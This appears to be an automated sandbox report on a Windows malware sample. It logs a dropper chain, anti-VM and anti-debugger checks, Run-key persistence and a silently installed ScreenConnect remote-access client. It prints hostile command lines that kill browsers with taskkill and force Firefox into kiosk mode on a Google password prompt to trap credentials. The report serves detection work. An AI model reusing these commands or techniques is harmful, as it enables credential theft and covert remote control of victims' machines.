000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000090f11e2400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 q3na5Mc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString q3na5Mc.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 2428 taskkill.exe 2908 taskkill.exe 2928 taskkill.exe 1860 taskkill.exe 836 taskkill.exe -
Modifies data under HKEY_USERS 13 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe -
Modifies registry class 37 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002\F371D3396946D7F0354CFF6462B809A1 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Version = "402915332" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\PackageCode = "F371D3396946D7F0354CFF6462B809A1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\InstanceType = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\URL Protocol msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Language = "1033" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\UseOriginalUrlEncoding = "1" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1\Full msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AdvertiseFlags = "388" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductIcon = "C:\\Windows\\Installer\\{933D173F-6496-0F7D-53C4-FF46268B901A}\\DefaultIcon" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\ = "ScreenConnect Client (3be09d9e5e840c20) Credential Provider" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductName = "ScreenConnect Client (3be09d9e5e840c20)" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387} msiexec.exe -
Suspicious behavior: EnumeratesProcesses 47 IoCs
pid Process 5816 2C8851.exe 5816 2C8851.exe 3404 3bc90bf583.exe 3404 3bc90bf583.exe 3404 3bc90bf583.exe 3404 3bc90bf583.exe 3404 3bc90bf583.exe 3404 3bc90bf583.exe 5816 2C8851.exe 5816 2C8851.exe 5816 2C8851.exe 5816 2C8851.exe 5980 2b11d98461.exe 5980 2b11d98461.exe 4900 c401331e54.exe 4900 c401331e54.exe 4900 c401331e54.exe 4900 c401331e54.exe 5732 865402586c.exe 5732 865402586c.exe 5732 865402586c.exe 5732 865402586c.exe 5732 865402586c.exe 5060 d6bdc78f1f.exe 5060 d6bdc78f1f.exe 4172 7834599193.exe 4172 7834599193.exe 7132 5da4d270e0.exe 7132 5da4d270e0.exe 3360 msiexec.exe 3360 msiexec.exe 1220 ScreenConnect.ClientService.exe 1220 ScreenConnect.ClientService.exe 1220 ScreenConnect.ClientService.exe 1220 ScreenConnect.ClientService.exe 1220 ScreenConnect.ClientService.exe 1220 ScreenConnect.ClientService.exe 5980 2b11d98461.exe 5980 2b11d98461.exe 5980 2b11d98461.exe 5980 2b11d98461.exe 3348 q3na5Mc.exe 3348 q3na5Mc.exe 3348 q3na5Mc.exe 3348 q3na5Mc.exe 3548 chrome.exe 3548 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2428 taskkill.exe Token: SeDebugPrivilege 2908 taskkill.exe Token: SeDebugPrivilege 2928 taskkill.exe Token: SeDebugPrivilege 1860 taskkill.exe Token: SeDebugPrivilege 836 taskkill.exe Token: SeDebugPrivilege 1812 firefox.exe Token: SeDebugPrivilege 1812 firefox.exe Token: SeDebugPrivilege 5732 865402586c.exe Token: SeDebugPrivilege 1396 67e0HNq.exe Token: SeShutdownPrivilege 1352 msiexec.exe Token: SeIncreaseQuotaPrivilege 1352 msiexec.exe Token: SeSecurityPrivilege 3360 msiexec.exe Token: SeCreateTokenPrivilege 1352 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1352 msiexec.exe Token: SeLockMemoryPrivilege 1352 msiexec.exe Token: SeIncreaseQuotaPrivilege 1352 msiexec.exe Token: SeMachineAccountPrivilege 1352 msiexec.exe Token: SeTcbPrivilege 1352 msiexec.exe Token: SeSecurityPrivilege 1352 msiexec.exe Token: SeTakeOwnershipPrivilege 1352 msiexec.exe Token: SeLoadDriverPrivilege 1352 msiexec.exe Token: SeSystemProfilePrivilege 1352 msiexec.exe Token: SeSystemtimePrivilege 1352 msiexec.exe Token: SeProfSingleProcessPrivilege 1352 msiexec.exe Token: SeIncBasePriorityPrivilege 1352 msiexec.exe Token: SeCreatePagefilePrivilege 1352 msiexec.exe Token: SeCreatePermanentPrivilege 1352 msiexec.exe Token: SeBackupPrivilege 1352 msiexec.exe Token: SeRestorePrivilege 1352 msiexec.exe Token: SeShutdownPrivilege 1352 msiexec.exe Token: SeDebugPrivilege 1352 msiexec.exe Token: SeAuditPrivilege 1352 msiexec.exe Token: SeSystemEnvironmentPrivilege 1352 msiexec.exe Token: SeChangeNotifyPrivilege 1352 msiexec.exe Token: SeRemoteShutdownPrivilege 1352 msiexec.exe Token: SeUndockPrivilege 1352 msiexec.exe Token: SeSyncAgentPrivilege 1352 msiexec.exe Token: SeEnableDelegationPrivilege 1352 msiexec.exe Token: SeManageVolumePrivilege 1352 msiexec.exe Token: SeImpersonatePrivilege 1352 msiexec.exe Token: SeCreateGlobalPrivilege 1352 msiexec.exe Token: SeCreateTokenPrivilege 1352 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1352 msiexec.exe Token: SeLockMemoryPrivilege 1352 msiexec.exe Token: SeIncreaseQuotaPrivilege 1352 msiexec.exe Token: SeMachineAccountPrivilege 1352 msiexec.exe Token: SeTcbPrivilege 1352 msiexec.exe Token: SeSecurityPrivilege 1352 msiexec.exe Token: SeTakeOwnershipPrivilege 1352 msiexec.exe Token: SeLoadDriverPrivilege 1352 msiexec.exe Token: SeSystemProfilePrivilege 1352 msiexec.exe Token: SeSystemtimePrivilege 1352 msiexec.exe Token: SeProfSingleProcessPrivilege 1352 msiexec.exe Token: SeIncBasePriorityPrivilege 1352 msiexec.exe Token: SeCreatePagefilePrivilege 1352 msiexec.exe Token: SeCreatePermanentPrivilege 1352 msiexec.exe Token: SeBackupPrivilege 1352 msiexec.exe Token: SeRestorePrivilege 1352 msiexec.exe Token: SeShutdownPrivilege 1352 msiexec.exe Token: SeDebugPrivilege 1352 msiexec.exe Token: SeAuditPrivilege 1352 msiexec.exe Token: SeSystemEnvironmentPrivilege 1352 msiexec.exe Token: SeChangeNotifyPrivilege 1352 msiexec.exe Token: SeRemoteShutdownPrivilege 1352 msiexec.exe -
Suspicious use of FindShellTrayWindow 60 IoCs
pid Process 4900 c401331e54.exe 4900 c401331e54.exe 4900 c401331e54.exe 4900 c401331e54.exe 4900 c401331e54.exe 4900 c401331e54.exe 4900 c401331e54.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 4900 c401331e54.exe 4900 c401331e54.exe 4900 c401331e54.exe 4900 c401331e54.exe 1352 msiexec.exe 1352 msiexec.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe 3548 chrome.exe -
Suspicious use of SendNotifyMessage 31 IoCs
pid Process 4900 c401331e54.exe 4900 c401331e54.exe 4900 c401331e54.exe 4900 c401331e54.exe 4900 c401331e54.exe 4900 c401331e54.exe 4900 c401331e54.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 1812 firefox.exe 4900 c401331e54.exe 4900 c401331e54.exe 4900 c401331e54.exe 4900 c401331e54.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1812 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 228 wrote to memory of 2060 228 09796a411a9925be00de01fc589b408289ad9f26ba54e07f02a2580feac86c6c.exe 87 PID 228 wrote to memory of 2060 228 09796a411a9925be00de01fc589b408289ad9f26ba54e07f02a2580feac86c6c.exe 87 PID 228 wrote to memory of 2060 228 09796a411a9925be00de01fc589b408289ad9f26ba54e07f02a2580feac86c6c.exe 87 PID 2060 wrote to memory of 6052 2060 1H13T0.exe 90 PID 2060 wrote to memory of 6052 2060 1H13T0.exe 90 PID 2060 wrote to memory of 6052 2060 1H13T0.exe 90 PID 228 wrote to memory of 5816 228 09796a411a9925be00de01fc589b408289ad9f26ba54e07f02a2580feac86c6c.exe 91 PID 228 wrote to memory of 5816 228 09796a411a9925be00de01fc589b408289ad9f26ba54e07f02a2580feac86c6c.exe 91 PID 228 wrote to memory of 5816 228 09796a411a9925be00de01fc589b408289ad9f26ba54e07f02a2580feac86c6c.exe 91 PID 6052 wrote to memory of 3404 6052 rapes.exe 97 PID 6052 wrote to memory of 3404 6052 rapes.exe 97 PID 6052 wrote to memory of 3404 6052 rapes.exe 97 PID 6052 wrote to memory of 5980 6052 rapes.exe 103 PID 6052 wrote to memory of 5980 6052 rapes.exe 103 PID 6052 wrote to memory of 5980 6052 rapes.exe 103 PID 6052 wrote to memory of 4900 6052 rapes.exe 104 PID 6052 wrote to memory of 4900 6052 rapes.exe 104 PID 6052 wrote to memory of 4900 6052 rapes.exe 104 PID 4900 wrote to memory of 2428 4900 c401331e54.exe 105 PID 4900 wrote to memory of 2428 4900 c401331e54.exe 105 PID 4900 wrote to memory of 2428 4900 c401331e54.exe 105 PID 4900 wrote to memory of 2908 4900 c401331e54.exe 107 PID 4900 wrote to memory of 2908 4900 c401331e54.exe 107 PID 4900 wrote to memory of 2908 4900 c401331e54.exe 107 PID 4900 wrote to memory of 2928 4900 c401331e54.exe 109 PID 4900 wrote to memory of 2928 4900 c401331e54.exe 109 PID 4900 wrote to memory of 2928 4900 c401331e54.exe 109 PID 4900 wrote to memory of 1860 4900 c401331e54.exe 111 PID 4900 wrote to memory of 1860 4900 c401331e54.exe 111 PID 4900 wrote to memory of 1860 4900 c401331e54.exe 111 PID 4900 wrote to memory of 836 4900 c401331e54.exe 113 PID 4900 wrote to memory of 836 4900 c401331e54.exe 113 PID 4900 wrote to memory of 836 4900 c401331e54.exe 113 PID 4900 wrote to memory of 916 4900 c401331e54.exe 115 PID 4900 wrote to memory of 916 4900 c401331e54.exe 115 PID 916 wrote to memory of 1812 916 firefox.exe 116 PID 916 wrote to memory of 1812 916 firefox.exe 116 PID 916 wrote to memory of 1812 916 firefox.exe 116 PID 916 wrote to memory of 1812 916 firefox.exe 116 PID 916 wrote to memory of 1812 916 firefox.exe 116 PID 916 wrote to memory of 1812 916 firefox.exe 116 PID 916 wrote to memory of 1812 916 firefox.exe 116 PID 916 wrote to memory of 1812 916 firefox.exe 116 PID 916 wrote to memory of 1812 916 firefox.exe 116 PID 916 wrote to memory of 1812 916 firefox.exe 116 PID 916 wrote to memory of 1812 916 firefox.exe 116 PID 1812 wrote to memory of 4528 1812 firefox.exe 117 PID 1812 wrote to memory of 4528 1812 firefox.exe 117 PID 1812 wrote to memory of 4528 1812 firefox.exe 117 PID 1812 wrote to memory of 4528 1812 firefox.exe 117 PID 1812 wrote to memory of 4528 1812 firefox.exe 117 PID 1812 wrote to memory of 4528 1812 firefox.exe 117 PID 1812 wrote to memory of 4528 1812 firefox.exe 117 PID 1812 wrote to memory of 4528 1812 firefox.exe 117 PID 1812 wrote to memory of 4528 1812 firefox.exe 117 PID 1812 wrote to memory of 4528 1812 firefox.exe 117 PID 1812 wrote to memory of 4528 1812 firefox.exe 117 PID 1812 wrote to memory of 4528 1812 firefox.exe 117 PID 1812 wrote to memory of 4528 1812 firefox.exe 117 PID 1812 wrote to memory of 4528 1812 firefox.exe 117 PID 1812 wrote to memory of 4528 1812 firefox.exe 117 PID 1812 wrote to memory of 4528 1812 firefox.exe 117 PID 1812 wrote to memory of 4528 1812 firefox.exe 117 PID 1812 wrote to memory of 4528 1812 firefox.exe 117 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\09796a411a9925be00de01fc589b408289ad9f26ba54e07f02a2580feac86c6c.exe"C:\Users\Admin\AppData\Local\Temp\09796a411a9925be00de01fc589b408289ad9f26ba54e07f02a2580feac86c6c.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1H13T0.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1H13T0.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"3⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6052 -
C:\Users\Admin\AppData\Local\Temp\10033670101\3bc90bf583.exe"C:\Users\Admin\AppData\Local\Temp\10033670101\3bc90bf583.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3404
-
-
C:\Users\Admin\AppData\Local\Temp\10033680101\2b11d98461.exe"C:\Users\Admin\AppData\Local\Temp\10033680101\2b11d98461.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5980
-
-
C:\Users\Admin\AppData\Local\Temp\10033690101\c401331e54.exe"C:\Users\Admin\AppData\Local\Temp\10033690101\c401331e54.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1860
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:836
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking5⤵
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking6⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2076 -parentBuildID 20240401114208 -prefsHandle 2000 -prefMapHandle 1992 -prefsLen 27412 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ea9ad52f-7a3f-4e6b-8f07-c79f8bc2c396} 1812 "\\.\pipe\gecko-crash-server-pipe.1812" gpu7⤵PID:4528
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2504 -parentBuildID 20240401114208 -prefsHandle 2496 -prefMapHandle 2492 -prefsLen 28332 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e787be88-9e96-48eb-b2f9-328ea2301333} 1812 "\\.\pipe\gecko-crash-server-pipe.1812" socket7⤵PID:4800
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3204 -childID 1 -isForBrowser -prefsHandle 3188 -prefMapHandle 3184 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1408 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a508d56b-47b3-4be7-afd2-ccc84f80ca90} 1812 "\\.\pipe\gecko-crash-server-pipe.1812" tab7⤵PID:4708
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3984 -childID 2 -isForBrowser -prefsHandle 3976 -prefMapHandle 3972 -prefsLen 32822 -prefMapSize 244628 -jsInitHandle 1408 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {44899d7f-60fc-4e52-ae52-e9fd0f75165c} 1812 "\\.\pipe\gecko-crash-server-pipe.1812" tab7⤵PID:5680
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4760 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4596 -prefMapHandle 2832 -prefsLen 32822 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {57c93faf-f3d1-4e59-96a8-bf1b9c05c451} 1812 "\\.\pipe\gecko-crash-server-pipe.1812" utility7⤵
- Checks processor information in registry
PID:6212
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5444 -childID 3 -isForBrowser -prefsHandle 5380 -prefMapHandle 5424 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1408 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5472eb0-f682-4e8e-bd5c-216e31e2095b} 1812 "\\.\pipe\gecko-crash-server-pipe.1812" tab7⤵PID:1924
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5660 -childID 4 -isForBrowser -prefsHandle 5576 -prefMapHandle 5580 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1408 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {44c8651b-7f5d-42d5-8c5e-3b97136e9279} 1812 "\\.\pipe\gecko-crash-server-pipe.1812" tab7⤵PID:6924
-
-
